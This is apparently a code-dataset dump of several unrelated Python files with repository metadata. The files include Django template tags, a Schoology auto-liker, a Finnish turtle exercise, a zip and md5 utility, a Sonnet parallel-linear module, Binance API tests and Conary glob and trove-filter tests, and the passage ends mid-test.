#coding=utf-8 ''' Created on 2016-1-18 @author: Devuser ''' from django import template from doraemon.auth_extend.user.templatetags.auth_required_node import LogoutRequiredNode,LoginRequiredNode,UserRequiredNode,ManagerRequiredNode,AdminRequiredNode register = template.Library() @register.tag() def admin_required(parser, token): nodelist = parser.parse(('end_admin',)) parser.delete_first_token() return AdminRequiredNode(nodelist) @register.tag() def manager_required(parser, token): nodelist = parser.parse(('end_manager',)) parser.delete_first_token() return ManagerRequiredNode(nodelist) @register.tag() def user_required(parser, token): nodelist = parser.parse(('end_user',)) parser.delete_first_token() return UserRequiredNode(nodelist) @register.tag() def login_required(parser, token): nodelist = parser.parse(('end_login',)) parser.delete_first_token() return LoginRequiredNode(nodelist) @register.tag() def logout_required(parser, token): nodelist = parser.parse(('end_logout',)) parser.delete_first_token() return LogoutRequiredNode(nodelist)
646
0
110
526c50830e718621f212e4da83405610854941d1
2,326
py
Python
schoolovy.py
N-l1/schoolovy
74ea456e04af6029b77cb8310915184a8467849e
[ "MIT" ]
null
null
null
schoolovy.py
N-l1/schoolovy
74ea456e04af6029b77cb8310915184a8467849e
[ "MIT" ]
null
null
null
schoolovy.py
N-l1/schoolovy
74ea456e04af6029b77cb8310915184a8467849e
[ "MIT" ]
null
null
null
import yaml import schoolopy import sys def err(msg): """ Prints out error message and exits with error. """ print(f"Error: {msg}") exit(1) def main(limit): """ Likes all the posts & comments in your most recent feed (20 posts). Args: limit: How many posts to like. Returns: A message of the number of posts & comments that were newly liked. """ with open('config.yaml', 'r') as file: config = yaml.load(file, Loader=yaml.FullLoader) sc = schoolopy.Schoology(schoolopy.Auth(config['key'], config['secret'])) post_liked = 0 comments_liked = 0 # Set the number of posts to check try: sc.limit = int(limit) except ValueError: err("The 'limit' argument must be a number") # Get updates try: updates = sc.get_feed() except KeyError: err("The key or secret is incorrect") print("Liking posts...") # Go through all most recent 20 posts for update in updates: # Like post try: sc.like(update.id) post_liked += 1 except schoolopy.NoDifferenceError: pass # Get comments if post is in a group if update.realm == "group": comments = sc.get_group_update_comments(update.id, update.group_id) # Else get comments if post is in a course elif update.realm == "section": comments = sc.get_section_update_comments(update.id, update.section_id) else: continue # Go through the comments inside the group for comment in comments: # Like each comment try: sc.like_comment(update.id, comment.id) comments_liked += 1 except schoolopy.NoDifferenceError: continue return ("---------------\n" f"Liked {post_liked} posts and {comments_liked} comments") if __name__ == "__main__": # Too many arguments are specified if len(sys.argv) > 2: err("Only the 'limit' argument is allowed") # Default limit is 20 limit = 20 if len(sys.argv) == 1 else sys.argv[1] print(main(limit))
26.735632
74
0.552021
import yaml import schoolopy import sys def err(msg): """ Prints out error message and exits with error. """ print(f"Error: {msg}") exit(1) def main(limit): """ Likes all the posts & comments in your most recent feed (20 posts). Args: limit: How many posts to like. Returns: A message of the number of posts & comments that were newly liked. """ with open('config.yaml', 'r') as file: config = yaml.load(file, Loader=yaml.FullLoader) sc = schoolopy.Schoology(schoolopy.Auth(config['key'], config['secret'])) post_liked = 0 comments_liked = 0 # Set the number of posts to check try: sc.limit = int(limit) except ValueError: err("The 'limit' argument must be a number") # Get updates try: updates = sc.get_feed() except KeyError: err("The key or secret is incorrect") print("Liking posts...") # Go through all most recent 20 posts for update in updates: # Like post try: sc.like(update.id) post_liked += 1 except schoolopy.NoDifferenceError: pass # Get comments if post is in a group if update.realm == "group": comments = sc.get_group_update_comments(update.id, update.group_id) # Else get comments if post is in a course elif update.realm == "section": comments = sc.get_section_update_comments(update.id, update.section_id) else: continue # Go through the comments inside the group for comment in comments: # Like each comment try: sc.like_comment(update.id, comment.id) comments_liked += 1 except schoolopy.NoDifferenceError: continue return ("---------------\n" f"Liked {post_liked} posts and {comments_liked} comments") if __name__ == "__main__": # Too many arguments are specified if len(sys.argv) > 2: err("Only the 'limit' argument is allowed") # Default limit is 20 limit = 20 if len(sys.argv) == 1 else sys.argv[1] print(main(limit))
0
0
0
a057e34d83d549a6400f01ec669293543215e6ee
1,535
py
Python
examples/session2-fi/loops.py
futurice/PythonInBrowser
066ab28ffad265efc7968b87f33dab2c68216d9d
[ "MIT" ]
4
2015-12-08T19:34:49.000Z
2019-09-08T22:11:05.000Z
examples/session2-fi/loops.py
futurice/PythonInBrowser
066ab28ffad265efc7968b87f33dab2c68216d9d
[ "MIT" ]
18
2016-10-14T13:48:39.000Z
2019-10-11T12:14:21.000Z
examples/session2-fi/loops.py
futurice/PythonInBrowser
066ab28ffad265efc7968b87f33dab2c68216d9d
[ "MIT" ]
4
2015-11-18T15:18:43.000Z
2018-03-02T09:36:23.000Z
# Loopit eli silmukat ##### INFO ##### # # Joskus monimutkaisen kuvion piirtäminen vaatii samojen # komentojen toistamista moneen kertaan. Loopilla eli silmukalla # voit toistaa koodipalikoita eli pätkiä koodia import turtle t = turtle.Turtle() # Seuraava on esimerkki silmukasta. # # "for" kertoo tietokoneelle että sen tulee toistaa jotakin # monta kertaa # # "in range(2)" kertoo että komento tulee toistaa 2 kertaa # # "i" on muuttuja jonka arvo kasvaa yhdellä jokaisen toiston # (eli iteraation) jälkeen. Muuttujaa i ei käytetä tässä # tehtäväss, mutta näet myöhemmin esimerkkejä, joissa siitä # on hyötyä. for i in range(2): # Seuraavilla riveillä on komennot jotka toistetaan. # Nämä rivit ollaan sisennetty, eli ne alkavat kahdella välilyönnillä # Sisennyksellä kerrotaan mitkä rivit kuuluvat toistettavaan koodipalikkaan. t.forward(30) t.left(120) t.forward(30) t.right(60) ##### TEHTÄVÄ 1 ##### # # Klikkaa 'run' ja katso mitä tapahtuu. # # Kuinka monta kertaa silmukka tulisi toistaa että tähti olisi valmis? # Laita oikea numero komennon range(...) sulkujen sisään. # Vinkkin: voit kokeilla useita eri numeroita ja katsoa mikä toimii ##### TEHTÄVÄ 2 ##### # # Mieti muita muotoja joissa on toistuva kaava. # Esimerkiksi: neliö, rappuset, aallot # # Muuta silmukkaa niin että se piirtää valitsemasi kuvion. # # Vinkki: Aloita piirtämällä vain yksi toisto kirjoittamalla # "range(1)" ja saa se piirtämään kuten haluat. Voit sitten # toistaa kuvion niin monta kertaa kuin haluat muuttamalla # range arvoa.
29.519231
78
0.755049
# Loopit eli silmukat ##### INFO ##### # # Joskus monimutkaisen kuvion piirtäminen vaatii samojen # komentojen toistamista moneen kertaan. Loopilla eli silmukalla # voit toistaa koodipalikoita eli pätkiä koodia import turtle t = turtle.Turtle() # Seuraava on esimerkki silmukasta. # # "for" kertoo tietokoneelle että sen tulee toistaa jotakin # monta kertaa # # "in range(2)" kertoo että komento tulee toistaa 2 kertaa # # "i" on muuttuja jonka arvo kasvaa yhdellä jokaisen toiston # (eli iteraation) jälkeen. Muuttujaa i ei käytetä tässä # tehtäväss, mutta näet myöhemmin esimerkkejä, joissa siitä # on hyötyä. for i in range(2): # Seuraavilla riveillä on komennot jotka toistetaan. # Nämä rivit ollaan sisennetty, eli ne alkavat kahdella välilyönnillä # Sisennyksellä kerrotaan mitkä rivit kuuluvat toistettavaan koodipalikkaan. t.forward(30) t.left(120) t.forward(30) t.right(60) ##### TEHTÄVÄ 1 ##### # # Klikkaa 'run' ja katso mitä tapahtuu. # # Kuinka monta kertaa silmukka tulisi toistaa että tähti olisi valmis? # Laita oikea numero komennon range(...) sulkujen sisään. # Vinkkin: voit kokeilla useita eri numeroita ja katsoa mikä toimii ##### TEHTÄVÄ 2 ##### # # Mieti muita muotoja joissa on toistuva kaava. # Esimerkiksi: neliö, rappuset, aallot # # Muuta silmukkaa niin että se piirtää valitsemasi kuvion. # # Vinkki: Aloita piirtämällä vain yksi toisto kirjoittamalla # "range(1)" ja saa se piirtämään kuten haluat. Voit sitten # toistaa kuvion niin monta kertaa kuin haluat muuttamalla # range arvoa.
0
0
0
7fc3e32ddb3a3537ba996d42f205b2e6ae14bd96
2,098
py
Python
bot_commands_test/exception.py
SimoneABNto/My-Code-Py
47276c1d69a92aa284685c9f148c1bd960147f7f
[ "MIT" ]
null
null
null
bot_commands_test/exception.py
SimoneABNto/My-Code-Py
47276c1d69a92aa284685c9f148c1bd960147f7f
[ "MIT" ]
null
null
null
bot_commands_test/exception.py
SimoneABNto/My-Code-Py
47276c1d69a92aa284685c9f148c1bd960147f7f
[ "MIT" ]
null
null
null
from queue import Queue, Empty from time import sleep from threading import Timer if __name__ == '__main__': main()
28.739726
85
0.560534
from queue import Queue, Empty from time import sleep from threading import Timer class CommandoLoader(object): def __init__(self): self.__bot = None self.__error_callback_function = None self.thread = None self.error_queue_function = None def start_demon(self, bot, error_queue_function, callback): self.__bot = bot self.error_queue_function = error_queue_function self.__start_auto_runner(None, callback, 10) print('Auto Run Demon Started') def __start_auto_runner(self, action, callback, interval: int): """ :param action: a function that have to be executed :param interval: a time in seconds Run the function every interval seconds """ def func(): while True: try: # here will be the stuff to run # action() raise Exception('An error occurred here.') except Exception as exc: print(exc) self.error_queue_function.put(exc) callback(exc) sleep(interval) try: self.thread = Timer(interval=interval, function=func) # wait in minutes self.thread.start() except Exception as e: print(e) def main(): error_queue_function = Queue() def callback(exc): # single error handling print('Message in chat for exc: {}'.format(exc)) return # multiple error handling, with queue try: print(error_queue_function.empty()) exc = error_queue_function.get(block=False) print(error_queue_function.empty()) except Empty: pass else: print('Message in chat for exc: {}'.format(exc)) cl = CommandoLoader() # none is the bot command to send messages cl.start_demon(None, error_queue_function, callback) if __name__ == '__main__': main()
1,375
540
50
77c55afce086a01fa8acafddadc82f59d1e34666
1,843
py
Python
core/common.py
MogooStudio/mogoopy
81d1bfc35fca46dd028f141fb59eb6d87d8396bc
[ "MIT" ]
null
null
null
core/common.py
MogooStudio/mogoopy
81d1bfc35fca46dd028f141fb59eb6d87d8396bc
[ "MIT" ]
null
null
null
core/common.py
MogooStudio/mogoopy
81d1bfc35fca46dd028f141fb59eb6d87d8396bc
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import hashlib import subprocess import sys import os G_ZIP_SPLIT_LINE = 500 G_ZIP_SPLIT_UNIT = 100
23.628205
90
0.58166
# -*- coding: utf-8 -*- import hashlib import subprocess import sys import os G_ZIP_SPLIT_LINE = 500 G_ZIP_SPLIT_UNIT = 100 def os_system(cmd, use_secure = False): print("cmd", cmd) os.system(cmd) def os_popen(cmd): print("cmd", cmd) np = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) while np.poll() is None: ret = np.stdout.readline()[:-1] if ret != "": print(ret) if np.poll(): print("cmd error:", cmd) sys.exit(1) def read_file(filename, mode="r"): with open(filename, mode) as f_read: buff = f_read.read() return buff def save_file(filename, content, mode="w"): with open(filename, mode) as f_write: f_write.write(content) def _md5(data): _hash = hashlib.md5(data).hexdigest() return _hash def md5(filepath): path = filepath.replace("\\", "/") print(path) with open(path, "rb") as f_read: buff = f_read.read() if len(buff) > 0: _hash = _md5(buff) return _hash else: return "" def zip_dir(name, dirpath): assert isinstance(dirpath, str), "error: dirpath={0}".format(dirpath) os.chdir(dirpath) files = [] for name in os.listdir(".."): files.append(os.path.join(dirpath, name)) zip_files(name, files) def zip_files(name, filepath): assert isinstance(filepath, list), "error: filepath={0}".format(filepath) zip_len = len(filepath) if zip_len <= 0: return if zip_len <= G_ZIP_SPLIT_LINE: cmd = "zip -r %s ./ -i %s" % (name, " -i ".join(filepath)) os_popen(cmd) else: while zip_len > 0: cmd = "zip -r %s ./ -i %s" % (name, " -i ".join(filepath[0:G_ZIP_SPLIT_UNIT])) os_popen(cmd) filepath = filepath[G_ZIP_SPLIT_UNIT:]
1,526
0
184
077095c547b884a222278093dfab78cec8fd69fa
3,839
py
Python
sonnet/src/parallel_linear.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
10,287
2017-04-07T12:33:37.000Z
2022-03-30T03:32:16.000Z
sonnet/src/parallel_linear.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
209
2017-04-07T15:57:11.000Z
2022-03-27T10:43:03.000Z
sonnet/src/parallel_linear.py
ScriptBox99/deepmind-sonnet
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
[ "Apache-2.0" ]
1,563
2017-04-07T13:15:06.000Z
2022-03-29T15:26:04.000Z
# Copyright 2019 The Sonnet Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Parallel linear module.""" import math from typing import Optional from sonnet.src import base from sonnet.src import initializers from sonnet.src import once from sonnet.src import utils import tensorflow as tf class ParallelLinears(base.Module): """Parallel linear. This is equivalent to n separate linears applied in parallel to n inputs. It takes an input of shape [num_linears, batch_size, input_size] and returns an output of shape [num_linears, batch_size, output_size]. It uses a single batched matmul which is more efficient than stacking separate snt.Linear layers. This is implemented using `num_linear`s first to avoid the need for transposes in order to make it efficient when stacking these. """ def __init__(self, output_size: int, with_bias: bool = True, w_init: Optional[initializers.Initializer] = None, b_init: Optional[initializers.Initializer] = None, name: Optional[str] = None): """Constructs a `ParallelLinear` module. Args: output_size: Output dimensionality. with_bias: Whether to include bias parameters. Default `True`. w_init: Optional initializer for the weights. By default the weights are initialized truncated random normal values with a standard deviation of `1 / sqrt(input_feature_size)`, which is commonly used when the inputs are zero centered (see https://arxiv.org/abs/1502.03167v3). b_init: Optional initializer for the bias. By default the bias is initialized to zero. name: Name of the module. """ super().__init__(name=name) self.output_size = output_size self.with_bias = with_bias self.w_init = w_init if with_bias: self.b_init = b_init if b_init is not None else initializers.Zeros() elif b_init is not None: raise ValueError("When not using a bias the b_init must be None.") @once.once def _initialize(self, inputs: tf.Tensor): """Constructs parameters used by this module.""" utils.assert_rank(inputs, 3) self.input_size = inputs.shape[2] if self.input_size is None: # Can happen inside an @tf.function. raise ValueError("Input size must be specified at module build time.") num_linears = inputs.shape[0] if num_linears is None: # Can happen inside an @tf.function. raise ValueError( "The number of linears must be specified at module build time.") if self.w_init is None: # See https://arxiv.org/abs/1502.03167v3. stddev = 1. / math.sqrt(self.input_size) self.w_init = initializers.TruncatedNormal(stddev=stddev) self.w = tf.Variable( self.w_init([num_linears, self.input_size, self.output_size], inputs.dtype), name="w") if self.with_bias: self.b = tf.Variable( self.b_init([num_linears, 1, self.output_size], inputs.dtype), name="b")
37.637255
80
0.68273
# Copyright 2019 The Sonnet Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Parallel linear module.""" import math from typing import Optional from sonnet.src import base from sonnet.src import initializers from sonnet.src import once from sonnet.src import utils import tensorflow as tf class ParallelLinears(base.Module): """Parallel linear. This is equivalent to n separate linears applied in parallel to n inputs. It takes an input of shape [num_linears, batch_size, input_size] and returns an output of shape [num_linears, batch_size, output_size]. It uses a single batched matmul which is more efficient than stacking separate snt.Linear layers. This is implemented using `num_linear`s first to avoid the need for transposes in order to make it efficient when stacking these. """ def __init__(self, output_size: int, with_bias: bool = True, w_init: Optional[initializers.Initializer] = None, b_init: Optional[initializers.Initializer] = None, name: Optional[str] = None): """Constructs a `ParallelLinear` module. Args: output_size: Output dimensionality. with_bias: Whether to include bias parameters. Default `True`. w_init: Optional initializer for the weights. By default the weights are initialized truncated random normal values with a standard deviation of `1 / sqrt(input_feature_size)`, which is commonly used when the inputs are zero centered (see https://arxiv.org/abs/1502.03167v3). b_init: Optional initializer for the bias. By default the bias is initialized to zero. name: Name of the module. """ super().__init__(name=name) self.output_size = output_size self.with_bias = with_bias self.w_init = w_init if with_bias: self.b_init = b_init if b_init is not None else initializers.Zeros() elif b_init is not None: raise ValueError("When not using a bias the b_init must be None.") @once.once def _initialize(self, inputs: tf.Tensor): """Constructs parameters used by this module.""" utils.assert_rank(inputs, 3) self.input_size = inputs.shape[2] if self.input_size is None: # Can happen inside an @tf.function. raise ValueError("Input size must be specified at module build time.") num_linears = inputs.shape[0] if num_linears is None: # Can happen inside an @tf.function. raise ValueError( "The number of linears must be specified at module build time.") if self.w_init is None: # See https://arxiv.org/abs/1502.03167v3. stddev = 1. / math.sqrt(self.input_size) self.w_init = initializers.TruncatedNormal(stddev=stddev) self.w = tf.Variable( self.w_init([num_linears, self.input_size, self.output_size], inputs.dtype), name="w") if self.with_bias: self.b = tf.Variable( self.b_init([num_linears, 1, self.output_size], inputs.dtype), name="b") def __call__(self, inputs: tf.Tensor) -> tf.Tensor: self._initialize(inputs) outputs = tf.matmul(inputs, self.w) if self.with_bias: outputs = tf.add(outputs, self.b) return outputs
182
0
25
c4035174e5609822f5176b25618ba665b6bcb7bd
1,431
py
Python
tests/spot/futures/test_futures_loan_borrow.py
fossabot/binance-connector-python
bab18df22ba57b407b15dd0a9147cd75e6389b9e
[ "MIT" ]
1
2021-08-05T03:36:24.000Z
2021-08-05T03:36:24.000Z
tests/spot/futures/test_futures_loan_borrow.py
fossabot/binance-connector-python
bab18df22ba57b407b15dd0a9147cd75e6389b9e
[ "MIT" ]
2
2021-07-12T11:18:55.000Z
2021-07-12T11:28:19.000Z
tests/spot/futures/test_futures_loan_borrow.py
fossabot/binance-connector-python
bab18df22ba57b407b15dd0a9147cd75e6389b9e
[ "MIT" ]
1
2021-07-10T20:50:04.000Z
2021-07-10T20:50:04.000Z
import responses from urllib.parse import urlencode from tests.util import random_str from tests.util import mock_http_response from binance.spot import Spot as Client from binance.error import ParameterRequiredError, ClientError mock_item = {"key_1": "value_1", "key_2": "value_2"} mock_exception = {"code": -1105, "msg": "error message."} key = random_str() secret = random_str() params = {"coin": "USDT", "collateralCoin": "BTC", "amount": "1"} def test_futures_loan_borrow_without_coin(): """Tests the API endpoint to borrow cross funds without coin""" params = {"coin": "", "collateralCoin": "BTC"} client = Client(key, secret) client.futures_loan_borrow.when.called_with(**params).should.throw( ParameterRequiredError ) def test_futures_loan_borrow_without_collateralCoin(): """Tests the API endpoint to borrow cross funds without collateralCoin""" params = {"coin": "USDT", "collateralCoin": ""} client = Client(key, secret) client.futures_loan_borrow.when.called_with(**params).should.throw( ParameterRequiredError ) @mock_http_response( responses.POST, "/sapi/v1/futures/loan/borrow\\?" + urlencode(params), mock_item, 200, ) def test_futures_loan_borrow(): """Tests the API endpoint to borrow cross funds""" client = Client(key, secret) response = client.futures_loan_borrow(**params) response.should.equal(mock_item)
27.519231
77
0.712788
import responses from urllib.parse import urlencode from tests.util import random_str from tests.util import mock_http_response from binance.spot import Spot as Client from binance.error import ParameterRequiredError, ClientError mock_item = {"key_1": "value_1", "key_2": "value_2"} mock_exception = {"code": -1105, "msg": "error message."} key = random_str() secret = random_str() params = {"coin": "USDT", "collateralCoin": "BTC", "amount": "1"} def test_futures_loan_borrow_without_coin(): """Tests the API endpoint to borrow cross funds without coin""" params = {"coin": "", "collateralCoin": "BTC"} client = Client(key, secret) client.futures_loan_borrow.when.called_with(**params).should.throw( ParameterRequiredError ) def test_futures_loan_borrow_without_collateralCoin(): """Tests the API endpoint to borrow cross funds without collateralCoin""" params = {"coin": "USDT", "collateralCoin": ""} client = Client(key, secret) client.futures_loan_borrow.when.called_with(**params).should.throw( ParameterRequiredError ) @mock_http_response( responses.POST, "/sapi/v1/futures/loan/borrow\\?" + urlencode(params), mock_item, 200, ) def test_futures_loan_borrow(): """Tests the API endpoint to borrow cross funds""" client = Client(key, secret) response = client.futures_loan_borrow(**params) response.should.equal(mock_item)
0
0
0
e531ec686052a49b40461d2d3da353e84817d346
24,729
py
Python
conary_test/cvctest/buildtest/expansiontest.py
sassoftware/conary
d418968acd5e11ee17ed6d91ca395ea10a040222
[ "Apache-2.0" ]
43
2015-03-31T01:37:10.000Z
2021-11-14T16:26:48.000Z
conary_test/cvctest/buildtest/expansiontest.py
sassoftware/conary
d418968acd5e11ee17ed6d91ca395ea10a040222
[ "Apache-2.0" ]
9
2015-06-10T16:39:41.000Z
2020-01-27T16:35:01.000Z
conary_test/cvctest/buildtest/expansiontest.py
sassoftware/conary
d418968acd5e11ee17ed6d91ca395ea10a040222
[ "Apache-2.0" ]
9
2015-04-07T08:12:37.000Z
2020-01-26T09:54:18.000Z
# # Copyright (c) SAS Institute Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from testrunner import testhelp from conary_test import rephelp import os from conary_test.cvctest.buildtest import policytest from conary import versions from conary.build import action, trovefilter from conary.conaryclient import cmdline from conary.deps import deps from conary.lib import util
42.709845
89
0.597921
# # Copyright (c) SAS Institute Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from testrunner import testhelp from conary_test import rephelp import os from conary_test.cvctest.buildtest import policytest from conary import versions from conary.build import action, trovefilter from conary.conaryclient import cmdline from conary.deps import deps from conary.lib import util class PackageRecipeTest(rephelp.RepositoryHelper): def touch(self, fn): d = os.path.dirname(fn) if not os.path.exists(fn): util.mkdirChain(d) f = open(fn, 'w') f.write('') f.close() def getRecipe(self): return policytest.DummyRecipe(self.cfg) def getGlob(self, pattern, extraMacros = {}): recipe = self.getRecipe() recipe.macros.update(extraMacros) return action.Glob(recipe, pattern) def getRegexp(self, pattern): return action.Regexp(pattern) def testGlobBasics(self): ref = '^foo$' glob = self.getGlob('foo') self.assertEquals(glob(), ref) self.assertEquals(repr(glob), "Glob('foo')") self.assertEquals(str(glob), "Glob('foo')") self.assertEquals(ref, glob) self.assertEquals(hash(ref), hash(glob)) self.assertEquals(glob, self.getGlob('foo')) self.assertEquals(glob, self.getRegexp(ref)) glob = self.getGlob('foo*') self.assertEquals(glob(), '^foo[^/]*$') self.assertEquals(repr(glob), "Glob('foo*')") self.assertEquals(str(glob), "Glob('foo*')") glob = self.getGlob('f?o') self.assertEquals(glob(), '^f[^/]o$') glob = self.getGlob('foo.*') self.assertEquals(glob(), '^foo\\.[^/]*$') glob = self.getGlob('%(datadir)s/foo', {'datadir': '/usr/share'}) self.assertEquals(glob(), '^\\/usr\\/share\\/foo$') self.assertEquals(repr(glob), "Glob('%(datadir)s/foo')") self.assertEquals(str(glob), "Glob('%%(datadir)s/foo')") glob = self.getGlob('%(datadir)s/?[!foo|bar][^baz][]', {'datadir': '/usr/share'}) self.assertEquals(glob(), \ '^\\/usr\\/share\\/[^/][^foo|bar][\\^baz]\\[\\]$') def testRegexpBasics(self): exp = '^foo$' reg = self.getRegexp(exp) self.assertEquals(reg, exp) self.assertEquals(reg, self.getRegexp(exp)) self.assertEquals(reg, self.getGlob('foo')) self.assertEquals(str(reg), "Regexp('^foo$')") self.assertEquals(repr(reg), "Regexp('^foo$')") def testExpandPaths(self): recipe = self.getRecipe() tmpDir = recipe.macros.destdir fn = os.path.join(tmpDir, 'foo') self.touch(fn) reg = self.getRegexp('/foo') paths = action._expandPaths([reg], recipe.macros) self.assertEquals([fn], paths) paths = action._expandPaths(['/*'], recipe.macros) self.assertEquals([fn], paths) glob = self.getGlob('/f?o') paths = action._expandPaths([glob], recipe.macros) self.assertEquals([fn], paths) def testExpandGlobsWithDirs(self): recipe = self.getRecipe() tmpDir = recipe.macros.destdir goodFn = os.path.join(tmpDir, 'foo.bar') badFn = os.path.join(tmpDir, 'foo', 'bar') self.touch(goodFn) self.touch(badFn) glob = self.getGlob('/foo*') paths = action._expandPaths([glob], recipe.macros) self.assertEquals(sorted([goodFn, os.path.dirname(badFn)]), sorted(paths)) glob = self.getGlob('/foo?*') paths = action._expandPaths([glob], recipe.macros) self.assertEquals([goodFn], paths) glob = self.getGlob('/foo?bar') paths = action._expandPaths([glob], recipe.macros) self.assertEquals([goodFn], paths) def testGlobExcludeDirs(self): recipeStr = """\ class TestGlob(PackageRecipe): name = 'testglob' version = '1.0.0' clearBuildRequires() def setup(r): r.MakeDirs('%(datadir)s/foo') r.ExcludeDirectories(exceptions = r.glob('%(datadir)s/*')) """ built, d = self.buildRecipe(recipeStr, "TestGlob") self.assertEquals(len(built), 1) self.assertEquals(built[0][0], 'testglob:data') def testRegexpConfig(self): recipeStr = """\ class TestRegexp(PackageRecipe): name = 'testregexp' version = '1.0.0' clearBuildRequires() def setup(r): r.Create('/var/foo') r.Config(r.regexp('/var/.*')) r.Create('%(datadir)s/foo') r.Config(r.regexp('%(datadir)s/.*')) """ built, d = self.buildRecipe(recipeStr, "TestRegexp") self.assertEquals(len(built), 2) self.assertEquals(sorted(x[0] for x in built), ['testregexp:data', 'testregexp:runtime']) repos = self.openRepository() for nvf in built: trvNVF = repos.findTrove(None, nvf) trv = repos.getTrove(*trvNVF[0]) for fileInfo in trv.iterFileList(): fileObj = repos.getFileVersion(fileInfo[0], fileInfo[2], fileInfo[3]) self.assertEquals(fileObj.flags.isConfig(), 1) def testGlobDoc(self): recipeStr = """\ class TestRegexp(PackageRecipe): name = 'testregexp' version = '1.0.0' clearBuildRequires() def setup(r): r.Create('foo', contents = 'foo') r.Doc(r.glob('f?o')) """ built, d = self.buildRecipe(recipeStr, "TestRegexp") self.assertEquals(len(built), 1) self.assertEquals(built[0][0], 'testregexp:supdoc') def testRegexpDoc(self): recipeStr = """\ class TestRegexp(PackageRecipe): name = 'testregexp' version = '1.0.0' clearBuildRequires() def setup(r): r.Create('foo', contents = 'foo') r.Doc(r.regexp('f.o')) """ built, d = self.buildRecipe(recipeStr, "TestRegexp") self.assertEquals(len(built), 1) self.assertEquals(built[0][0], 'testregexp:supdoc') class TroveFilterTest(rephelp.RepositoryHelper): def setUp(self): rephelp.RepositoryHelper.setUp(self) def getRecipe(self): return policytest.DummyRecipe(self.cfg) @testhelp.context('trove-filter') def testTroveFilterBasics(self): recipe = self.getRecipe() filt = trovefilter.TroveFilter(recipe, 'foo', version = 'test.rpath.local@rpl:devel') nvf = cmdline.parseTroveSpec('foo=test.rpath.local@rpl:devel') self.assertEquals(filt.match((nvf,)), True) nvf = cmdline.parseTroveSpec('foo=foo.rpath.local@rpl:devel') self.assertEquals(filt.match((nvf,)), False) filt = trovefilter.TroveFilter(recipe, 'foo', version = '/test.rpath.local@rpl:devel') nvf = cmdline.parseTroveSpec('foo=/test.rpath.local@rpl:devel') self.assertEquals(filt.match((nvf,)), True) nvf = cmdline.parseTroveSpec('foo=/foo.rpath.local@rpl:devel') self.assertEquals(filt.match((nvf,)), False) filt = trovefilter.TroveFilter(recipe, 'foo', version = '/test.rpath.local@rpl:devel/1-1-1') nvf = cmdline.parseTroveSpec('foo=/test.rpath.local@rpl:devel/1-1-1') self.assertEquals(filt.match((nvf,)), True) nvf = cmdline.parseTroveSpec('foo=/foo.rpath.local@rpl:devel/1-1-1') self.assertEquals(filt.match((nvf,)), False) @testhelp.context('trove-filter') def testBadTroveFilters(self): recipe = self.getRecipe() filt = trovefilter.AbstractFilter() self.assertRaises(NotImplementedError, filt.match) try: filt = trovefilter.TroveFilter(recipe, 'foo(') except RuntimeError, e: self.assertEquals(str(e), "Bad Regexp: 'foo(' for name") else: self.fail("Expected RuntimeError") nvf = cmdline.parseTroveSpec('foo=/test.rpath.local@rpl:devel') filt = trovefilter.TroveFilter(recipe, 'foo') self.assertEquals(filt.match((nvf,)), True) filt.compile() filt.versionType = True filt.version = 'foo' self.assertEquals(filt.match((nvf,)), False) @testhelp.context('trove-filter') def testTroveFilterVersion(self): recipe = self.getRecipe() filt = trovefilter.TroveFilter(recipe, 'foo', version = 'test.rpath.local@rpl:linux') filt2 = trovefilter.TroveFilter(recipe, 'bar', version = 'test.rpath.local@rpl:linux') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), True) self.assertEquals(filt2.match((nvf,)), False) filt = trovefilter.TroveFilter(recipe, 'foo', version = '/test.rpath.local@rpl:linux') self.assertEquals(filt.match((nvf,)), True) filt = trovefilter.TroveFilter(recipe, 'foo', version = '/test.rpath.local@rpl:linux/1-1-1') self.assertEquals(filt.match((nvf,)), True) filt = trovefilter.TroveFilter(recipe, 'foo', version = 'test.rpath.local@rpl:linux') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:devel/1-1-1'), deps.parseFlavor('')) self.assertEquals(filt.match((nvf,)), False) filt = trovefilter.TroveFilter(recipe, 'foo', version = '/test.rpath.local@rpl:linux') self.assertEquals(filt.match((nvf,)), False) filt = trovefilter.TroveFilter(recipe, 'foo', version = '/test.rpath.local@rpl:linux/1-1-1') self.assertEquals(filt.match((nvf,)), False) @testhelp.context('trove-filter') def testTroveFilterMacros(self): recipe = self.getRecipe() recipe.macros.name = 'foo' # test a macro in the name element filt = trovefilter.TroveFilter(recipe, '%(name)s', version = 'test.rpath.local@rpl:linux') nvf = ('foo', versions.VersionFromString( \ '/test.rpath.local@rpl:linux/1-1-1'), 